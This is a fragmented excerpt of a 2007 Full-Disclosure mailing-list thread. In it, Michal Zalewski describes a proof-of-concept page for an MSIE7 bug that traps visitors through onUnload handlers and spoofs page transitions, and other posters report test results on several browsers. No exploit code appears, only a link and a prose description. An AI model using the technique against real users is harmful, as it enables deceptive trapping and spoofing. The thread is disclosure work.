On Fri, 23 Feb 2007, Jeffrey Katz wrote:
Just checked on IE 7.0.5730.11 -- doesn't exhibit problem.
Most certainly does; you might have scripting disabled, or be
experiencing some other anomaly, but for much of the population, the
attack works as advertised on that version.
/mz
PoC successful on firefox 1.5.0.3 on linux along it didn't load the wormhole
site, just left a blank page for any page browsed after your etrap.
Wormhole site was seen on IE 7.0.5346.5 on xp
___
Full-Disclosure - We believe in it.
Charter:
Just checked on IE 7.0.5730.11 -- doesn't exhibit problem.
On Firefox 2.0.0.2 -- first blank page, then, if reloaded, your
trapped in a wormhole page.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
On Fri, 23 Feb 2007, Michal Zalewski wrote:
http://lcamtuf.coredump.cx/ietrap/
I accidentally left a portion of code used to test for the Firefox memory
corruption / MSIE7 NULL ptr condition inside 'attack.js' for this page.
This crashed the testcase for some users, instead of demonstrating
There is a cool combination-type vulnerability in MSIE7 that allows the
attacker to:
a) Trap the visitor in a Matrix-esque tarpit webpage that cannot be left
by normal means (this is a known brain-damaged design of onUnload
Javascript handlers),
b) Spoof transitions between pages
Michal Zalewski wrote:
Firefox isn't outright vulnerable to this problem, but judging from its
behavior, it is likely to be susceptible to a variant of this bug (it
exhibits the same behavior, but we end up with a corrupted page instead);
Will you give Opera some love, too? Opera has always